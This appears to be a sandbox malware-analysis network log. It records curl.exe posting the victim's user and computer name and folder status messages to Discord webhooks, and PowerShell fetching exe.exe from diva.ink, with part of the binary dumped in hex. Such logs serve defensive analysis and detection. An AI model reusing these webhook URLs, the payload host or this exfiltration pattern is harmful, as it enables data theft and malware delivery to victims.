                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                              Set-Cookie: __sdcfduid=2d2e4b4e83d711efbbb5069e833022f9cef3e9ced00fa7b64b4c1686e6ff1a63df6cc21685dcedc62ec80ba1cc5929de; Expires=Fri, 05-Oct-2029 11:36:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                              Set-Cookie: __cfruid=b37bbe72c413031a900b56b1d31d11a902acd7e0-1728214567; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                              2024-10-06 11:36:07 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 35 7a 41 68 51 52 49 79 4f 62 45 70 78 50 37 61 4f 35 6e 67 49 6e 43 4d 62 59 71 55 46 4c 73 30 54 68 62 42 46 6b 4e 61 49 4a 45 2d 31 37 32 38 32 31 34 35 36 37 31 31 31 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 65 35 35 61 31 34 32 64 62 32 30 66 38 39 2d 45 57 52 0d 0a 0d 0a
                                                                                                                              Data Ascii: Set-Cookie: _cfuvid=5zAhQRIyObEpxP7aO5ngInCMbYqUFLs0ThbBFkNaIJE-1728214567111-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ce55a142db20f89-EWR
                                                                                                                              2024-10-06 11:36:07 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                              Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.849710162.159.137.2324433524C:\Windows\System32\curl.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-06 11:36:08 UTC229OUTPOST /api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz HTTP/1.1
                                                                                                                              Host: discord.com
                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 45
                                                                                                                              2024-10-06 11:36:08 UTC45OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 59 41 59 20 68 75 62 65 72 74 2c 20 43 6f 6d 70 75 74 65 72 3a 20 48 55 42 45 52 54 2d 50 43 22 7d
                                                                                                                              Data Ascii: {"content":"YAY user, Computer: user-PC"}
                                                                                                                              2024-10-06 11:36:08 UTC1341INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sun, 06 Oct 2024 11:36:08 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 45
                                                                                                                              Connection: close
                                                                                                                              set-cookie: __dcfduid=2e072e0a83d711ef8c1ba6b9cfeb62f1; Expires=Fri, 05-Oct-2029 11:36:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                              x-ratelimit-limit: 5
                                                                                                                              x-ratelimit-remaining: 4
                                                                                                                              x-ratelimit-reset: 1728214569
                                                                                                                              x-ratelimit-reset-after: 1
                                                                                                                              via: 1.1 google
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sOoC3SBezCg0nU%2BOEXHjKZMPd4R86nMK2v7QN9Pkdfjq21IFcLAifYU2D%2BnK0og1p%2FKSJQL2b0ZQdQ09N%2BWhw5avZO39PrnzuD%2BfH93z7osICy9a6h%2FmZP4jcTni"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                              Set-Cookie: __sdcfduid=2e072e0a83d711ef8c1ba6b9cfeb62f149dd75b89a5720c855583c6a29207d0006d76d49577469e0cf5f2f0ca379ffa1; Expires=Fri, 05-Oct-2029 11:36:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                              Set-Cookie: __cfruid=bb964afb29782512641559f220b160214513b907-1728214568; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                              2024-10-06 11:36:08 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 4f 4b 31 39 35 46 58 45 68 74 58 32 4d 37 74 46 33 50 6a 36 48 31 6b 30 34 42 6b 6f 4e 75 32 77 6b 50 4b 75 56 41 36 4f 32 34 49 2d 31 37 32 38 32 31 34 35 36 38 35 33 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 65 35 35 61 31 63 66 65 37 65 63 34 34 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                              Data Ascii: Set-Cookie: _cfuvid=OK195FXEhtX2M7tF3Pj6H1k04BkoNu2wkPKuVA6O24I-1728214568536-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ce55a1cfe7ec44f-EWR
                                                                                                                              2024-10-06 11:36:08 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                              Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.864892162.159.128.2334436364C:\Windows\System32\curl.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-06 11:37:28 UTC233OUTPOST /api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd HTTP/1.1
                                                                                                                              Host: ptb.discord.com
                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 91
                                                                                                                              2024-10-06 11:37:28 UTC91OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 46 61 69 6c 65 64 20 74 6f 20 63 68 61 6e 67 65 20 64 69 72 65 63 74 6f 72 79 20 74 6f 20 27 43 3a 5c 5c 55 73 65 72 73 5c 5c 50 75 62 6c 69 63 5c 5c 44 6f 63 75 6d 65 6e 74 73 5c 5c 53 65 63 72 65 74 20 44 6f 63 75 6d 65 6e 74 27 22 7d
                                                                                                                              Data Ascii: {"content":"Failed to change directory to 'C:\\Users\\Public\\Documents\\Secret Document'"}
                                                                                                                              2024-10-06 11:37:28 UTC1345INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sun, 06 Oct 2024 11:37:28 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 45
                                                                                                                              Connection: close
                                                                                                                              set-cookie: __dcfduid=5db2103e83d711efb9496aa08501a966; Expires=Fri, 05-Oct-2029 11:37:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                              x-ratelimit-limit: 5
                                                                                                                              x-ratelimit-remaining: 4
                                                                                                                              x-ratelimit-reset: 1728214649
                                                                                                                              x-ratelimit-reset-after: 1
                                                                                                                              via: 1.1 google
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LtjJdExVy97iaETFDYwF%2F7DxwZGf2Vm9Bpjw9FE3s3a114TFt%2BxXYNdNiRVrgkncYTVuXkLtFGihwfWwK7lMLkwLcCCQgQqodupcxuKxbzzYx3X6yZUyYnVfVuKOTAwSBw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                              Set-Cookie: __sdcfduid=5db2103e83d711efb9496aa08501a9665f4224957175ab610e045a13edcb3f791b0e3e2b5c889874fe9ef19eba1a1711; Expires=Fri, 05-Oct-2029 11:37:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                              Set-Cookie: __cfruid=4216abe66f60e6f26d03b5316b71ec33601d74bb-1728214648; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                              2024-10-06 11:37:28 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 47 41 77 64 42 4f 5f 48 45 37 30 4f 49 69 4b 36 45 4e 6a 72 52 67 71 55 41 43 7a 67 63 69 58 65 6a 4c 4b 65 5f 47 66 56 53 75 49 2d 31 37 32 38 32 31 34 36 34 38 35 30 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 65 35 35 63 31 30 64 64 33 32 35 35 39 30 2d 45 57 52 0d 0a 0d 0a
                                                                                                                              Data Ascii: Set-Cookie: _cfuvid=GAwdBO_HE70OIiK6ENjrRgqUACzgciXejLKe_GfVSuI-1728214648505-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ce55c10dd325590-EWR
                                                                                                                              2024-10-06 11:37:28 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                              Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.864897162.159.128.2334434268C:\Windows\System32\curl.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-06 11:37:30 UTC234OUTPOST /api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd HTTP/1.1
                                                                                                                              Host: ptb.discord.com
                                                                                                                              User-Agent: curl/7.83.1
                                                                                                                              Accept: */*
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 114
                                                                                                                              2024-10-06 11:37:30 UTC114OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 46 61 69 6c 65 64 20 74 6f 20 63 72 65 61 74 65 20 61 6e 64 20 63 68 61 6e 67 65 20 64 69 72 65 63 74 6f 72 79 20 74 6f 20 27 43 3a 5c 5c 55 73 65 72 73 5c 5c 50 75 62 6c 69 63 5c 5c 44 6f 63 75 6d 65 6e 74 73 5c 5c 53 65 63 72 65 74 20 44 6f 63 75 6d 65 6e 74 27 20 61 66 74 65 72 20 72 65 74 72 79 22 7d
                                                                                                                              Data Ascii: {"content":"Failed to create and change directory to 'C:\\Users\\Public\\Documents\\Secret Document' after retry"}
                                                                                                                              2024-10-06 11:37:30 UTC1347INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sun, 06 Oct 2024 11:37:30 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 45
                                                                                                                              Connection: close
                                                                                                                              set-cookie: __dcfduid=5f138d1883d711ef9a43b24ca2cdc774; Expires=Fri, 05-Oct-2029 11:37:30 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                              x-ratelimit-limit: 5
                                                                                                                              x-ratelimit-remaining: 4
                                                                                                                              x-ratelimit-reset: 1728214652
                                                                                                                              x-ratelimit-reset-after: 1
                                                                                                                              via: 1.1 google
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=19sInuO38Ar0dPAU27c3KDCtTqzB8lQk2%2FecDwtHb3Kpc6QhtSqbhu6RTGBXgn65K8opGlRi%2BPsDGdGtxRuiTcSqGjN6wQzsxCRXNtARTWY02wFf9uHr%2F3W0eS9DOn11yQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                              Set-Cookie: __sdcfduid=5f138d1883d711ef9a43b24ca2cdc774fb28e2dbb8f9a4eb9da8c2268aeffa1bb73952ade3ca065bd126775ba035ce45; Expires=Fri, 05-Oct-2029 11:37:30 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                              Set-Cookie: __cfruid=5c1c52db2546bb0b04da3053595ec57af65671bc-1728214650; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                              2024-10-06 11:37:30 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 46 64 65 59 32 70 72 41 70 49 4c 6f 54 78 66 35 74 37 72 69 78 73 54 67 47 53 32 67 6f 48 6e 4d 57 77 43 66 67 49 4a 49 43 36 6b 2d 31 37 32 38 32 31 34 36 35 30 38 32 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 65 35 35 63 31 66 34 39 65 37 34 33 34 30 2d 45 57 52 0d 0a 0d 0a
                                                                                                                              Data Ascii: Set-Cookie: _cfuvid=FdeY2prApILoTxf5t7rixsTgGS2goHnMWwCfgIJIC6k-1728214650823-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ce55c1f49e74340-EWR
                                                                                                                              2024-10-06 11:37:30 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                              Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.864901185.199.108.1534436104C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-06 11:37:33 UTC65OUTGET /exe.exe HTTP/1.1
                                                                                                                              Host: diva.ink
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-10-06 11:37:33 UTC651INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 80384
                                                                                                                              Server: GitHub.com
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Last-Modified: Sat, 05 Oct 2024 21:16:13 GMT
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              ETag: "6701ac9d-13a00"
                                                                                                                              expires: Sun, 06 Oct 2024 11:47:33 GMT
                                                                                                                              Cache-Control: max-age=600
                                                                                                                              x-proxy-cache: MISS
                                                                                                                              X-GitHub-Request-Id: 8F6A:29763:32F8CFC:38B3DBC:67027676
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Age: 0
                                                                                                                              Date: Sun, 06 Oct 2024 11:37:33 GMT
                                                                                                                              Via: 1.1 varnish
                                                                                                                              X-Served-By: cache-nyc-kteb1890082-NYC
                                                                                                                              X-Cache: MISS
                                                                                                                              X-Cache-Hits: 0
                                                                                                                              X-Timer: S1728214654.576227,VS0,VE29
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Fastly-Request-ID: 457d992239a1b159f460a9d81464e35786845944
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 dc 09 d7 d6 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 32 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00
                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"02 @ `@@
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 04 03 28 22 00 00 0a 2a 36 02 7c e0 00 00 04 03 28 22 00 00 0a 2a 36 02 7c e7 00 00 04 03 28 22 00 00 0a 2a 36 02 7c ef 00 00 04 03 28 22 00 00 0a 2a 36 02 7c f5 00 00 04 03 28 22 00 00 0a 2a 46 02 7b fa 00 00 04 7e 2a 00 00 04 28 2b 00 00 06 2a 36 02 7c fc 00 00 04 03 28 22 00 00 0a 2a 56 72 5d 31 00 70 80 06 01 00 04 72 f0 31 00 70 80 07 01 00 04 2a 13 30 02 00 37 00 00 00 01 00 00 11 12 00 28 16 00 00 0a 7d 07 00 00 04 12 00 02 7d 08 00 00 04 12 00 15 7d 06 00 00 04 12 00 7c 07 00 00 04 12 00 28 01 00 00 2b 12 00 7c 07 00 00 04 28 18 00 00 0a 2a 00 13 30 02 00 3f 00 00 00 02 00 00 11 12 00 28 16 00 00 0a 7d 0b 00 00 04 12 00 02 7d 0c 00 00 04 12 00 03 7d 0d 00 00 04 12 00 15 7d 0a 00 00 04 12 00 7c 0b 00 00 04 12 00 28 02 00 00 2b 12 00 7c 0b 00 00 04
                                                                                                                              Data Ascii: ("*6|("*6|("*6|("*6|("*F{~*(+*6|("*Vr]1pr1p*07(}}}|(+|(*0?(}}}}|(+|
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 00 00 04 12 02 02 28 0a 00 00 2b de 7a 02 7b 13 00 00 04 0c 02 7c 13 00 00 04 fe 15 0c 00 00 01 02 15 25 0a 7d 10 00 00 04 12 02 28 1f 00 00 0a 07 7b 04 00 00 04 6f 24 00 00 0a 07 14 7d 04 00 00 04 07 7b 05 00 00 04 6f 26 00 00 0a 07 14 7d 05 00 00 04 07 16 7d 03 00 00 04 de 17 0d 02 1f fe 7d 10 00 00 04 02 7c 11 00 00 04 09 28 20 00 00 0a de 13 02 1f fe 7d 10 00 00 04 02 7c 11 00 00 04 28 21 00 00 0a 2a 41 1c 00 00 00 00 00 00 0e 00 00 00 53 01 00 00 61 01 00 00 17 00 00 00 1b 00 00 01 1b 30 04 00 75 02 00 00 08 00 00 11 02 7b 16 00 00 04 0a 02 7b 18 00 00 04 0b 06 17 36 51 02 73 10 00 00 06 7d 19 00 00 04 02 7b 19 00 00 04 02 7b 18 00 00 04 7d 14 00 00 04 02 07 7b 05 00 00 04 6f 29 00 00 0a 7d 1a 00 00 04 02 7b 19 00 00 04 14 7d 15 00 00 04 14 0c 02 07
                                                                                                                              Data Ascii: (+z{|%}({o$}{o&}}}|( }|(!*ASa0u{{6Qs}{{}{o)}{}
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 15 00 00 2b 12 00 7c 3d 00 00 04 28 18 00 00 0a 2a 00 13 30 02 00 37 00 00 00 0f 00 00 11 12 00 28 4e 00 00 0a 7d 41 00 00 04 12 00 02 7d 42 00 00 04 12 00 15 7d 40 00 00 04 12 00 7c 41 00 00 04 12 00 28 16 00 00 2b 12 00 7c 41 00 00 04 28 50 00 00 0a 2a 00 13 30 02 00 37 00 00 00 10 00 00 11 12 00 28 16 00 00 0a 7d 4b 00 00 04 12 00 02 7d 4c 00 00 04 12 00 15 7d 4a 00 00 04 12 00 7c 4b 00 00 04 12 00 28 17 00 00 2b 12 00 7c 4b 00 00 04 28 18 00 00 0a 2a 00 13 30 02 00 3f 00 00 00 11 00 00 11 12 00 28 51 00 00 0a 7d 50 00 00 04 12 00 02 7d 51 00 00 04 12 00 03 7d 52 00 00 04 12 00 15 7d 4f 00 00 04 12 00 7c 50 00 00 04 12 00 28 18 00 00 2b 12 00 7c 50 00 00 04 28 53 00 00 0a 2a 00 13 30 02 00 4f 00 00 00 12 00 00 11 12 00 28 51 00 00 0a 7d 57 00 00 04 12
                                                                                                                              Data Ascii: +|=(*07(N}A}B}@|A(+|A(P*07(}K}L}J|K(+|K(*0?(Q}P}Q}R}O|P(+|P(S*0O(Q}W
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 00 00 0a 7d a3 00 00 04 12 00 02 7d a4 00 00 04 12 00 15 7d a2 00 00 04 12 00 7c a3 00 00 04 12 00 28 27 00 00 2b 12 00 7c a3 00 00 04 28 18 00 00 0a 2a 00 13 30 02 00 37 00 00 00 23 00 00 11 12 00 28 16 00 00 0a 7d a7 00 00 04 12 00 02 7d a8 00 00 04 12 00 15 7d a6 00 00 04 12 00 7c a7 00 00 04 12 00 28 28 00 00 2b 12 00 7c a7 00 00 04 28 18 00 00 0a 2a 00 13 30 02 00 3f 00 00 00 24 00 00 11 12 00 28 16 00 00 0a 7d ab 00 00 04 12 00 02 7d ad 00 00 04 12 00 03 7d ac 00 00 04 12 00 15 7d aa 00 00 04 12 00 7c ab 00 00 04 12 00 28 29 00 00 2b 12 00 7c ab 00 00 04 28 18 00 00 0a 2a 00 13 30 04 00 1f 00 00 00 25 00 00 11 17 0a 1f 1d 0b 28 5c 00 00 0a 28 5d 00 00 0a 6f 5e 00 00 0a 07 12 00 1a 28 16 00 00 06 26 2a 00 13 30 04 00 1f 00 00 00 25 00 00 11 16 0a 1f
                                                                                                                              Data Ascii: }}}|('+|(*07#(}}}|((+|(*0?$(}}}}|()+|(*0%(\(]o^(&*0%
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 02 00 37 00 00 00 34 00 00 11 12 00 28 16 00 00 0a 7d f5 00 00 04 12 00 02 7d f6 00 00 04 12 00 15 7d f4 00 00 04 12 00 7c f5 00 00 04 12 00 28 36 00 00 2b 12 00 7c f5 00 00 04 28 18 00 00 0a 2a 00 13 30 02 00 3f 00 00 00 35 00 00 11 12 00 28 16 00 00 0a 7d fc 00 00 04 12 00 02 7d fd 00 00 04 12 00 03 7d fe 00 00 04 12 00 15 7d fb 00 00 04 12 00 7c fc 00 00 04 12 00 28 37 00 00 2b 12 00 7c fc 00 00 04 28 18 00 00 0a 2a 00 13 30 04 00 ab 00 00 00 00 00 00 00 73 78 00 00 0a 80 26 00 00 04 73 09 00 00 06 80 27 00 00 04 7e 06 01 00 04 80 28 00 00 04 7e 07 01 00 04 80 29 00 00 04 72 e9 01 00 70 80 2a 00 00 04 73 79 00 00 0a 80 2b 00 00 04 73 7a 00 00 0a 80 2c 00 00 04 73 7b 00 00 0a 80 2d 00 00 04 73 79 00 00 0a 25 72 f5 01 00 70 72 07 02 00 70 6f 7c 00 00 0a
                                                                                                                              Data Ascii: 74(}}}|(6+|(*0?5(}}}}|(7+|(*0sx&s'~(~)rp*sy+sz,s{-sy%rprpo|
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 20 00 00 06 0c 08 28 39 00 00 0a 7e 27 00 00 04 08 6f 07 00 00 06 6f 1c 00 00 0a 0d 12 03 28 1d 00 00 0a 2d 3c 02 16 25 0a 7d 3c 00 00 04 02 09 7d 3f 00 00 04 02 7c 3d 00 00 04 12 03 02 28 3b 00 00 2b de 51 02 7b 3f 00 00 04 0d 02 7c 3f 00 00 04 fe 15 0c 00 00 01 02 15 25 0a 7d 3c 00 00 04 12 03 28 1f 00 00 0a de 19 13 04 02 1f fe 7d 3c 00 00 04 02 7c 3d 00 00 04 11 04 28 20 00 00 0a de 13 02 1f fe 7d 3c 00 00 04 02 7c 3d 00 00 04 28 21 00 00 0a 2a 00 01 10 00 00 00 00 07 00 ff 06 01 19 1b 00 00 01 1b 30 06 00 3d 04 00 00 39 00 00 11 02 7b 40 00 00 04 0a 06 45 04 00 00 00 e6 01 00 00 4f 02 00 00 eb 02 00 00 a3 03 00 00 02 7b 42 00 00 04 72 be 06 00 70 6f 82 00 00 0a 28 1d 00 00 06 72 26 07 00 70 6f 82 00 00 0a 0c 02 7b 42 00 00 04 72 be 06 00 70 6f 82 00
                                                                                                                              Data Ascii: (9~'oo(-<%}<}?|=(;+Q{?|?%}<(}<|=( }<|=(!*0=9{@EO{Brpo(r&po{Brpo
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 08 1f 0a 2e 0d 08 1f 0b 3b e7 00 00 00 38 b5 04 00 00 7e 28 00 00 04 28 25 00 00 06 6f 1c 00 00 0a 0d 12 03 28 1d 00 00 0a 2d 3f 02 16 25 0a 7d 4a 00 00 04 02 09 7d 4d 00 00 04 02 7c 4b 00 00 04 12 03 02 28 41 00 00 2b dd a7 04 00 00 02 7b 4d 00 00 04 0d 02 7c 4d 00 00 04 fe 15 0c 00 00 01 02 15 25 0a 7d 4a 00 00 04 12 03 28 1f 00 00 0a 02 7b 4c 00 00 04 72 be 06 00 70 6f 82 00 00 0a 28 1d 00 00 06 72 b1 08 00 70 6f 82 00 00 0a a5 52 00 00 01 28 24 00 00 06 6f 1c 00 00 0a 0d 12 03 28 1d 00 00 0a 2d 3f 02 17 25 0a 7d 4a 00 00 04 02 09 7d 4d 00 00 04 02 7c 4b 00 00 04 12 03 02 28 41 00 00 2b dd 29 04 00 00 02 7b 4d 00 00 04 0d 02 7c 4d 00 00 04 fe 15 0c 00 00 01 02 15 25 0a 7d 4a 00 00 04 12 03 28 1f 00 00 0a 38 d3 03 00 00 72 d7 08 00 70 28 39 00 00 0a 38
                                                                                                                              Data Ascii: .;8~((%o(-?%}J}M|K(A+{M|M%}J({Lrpo(rpoR($o(-?%}J}M|K(A+){M|M%}J(8rp(98
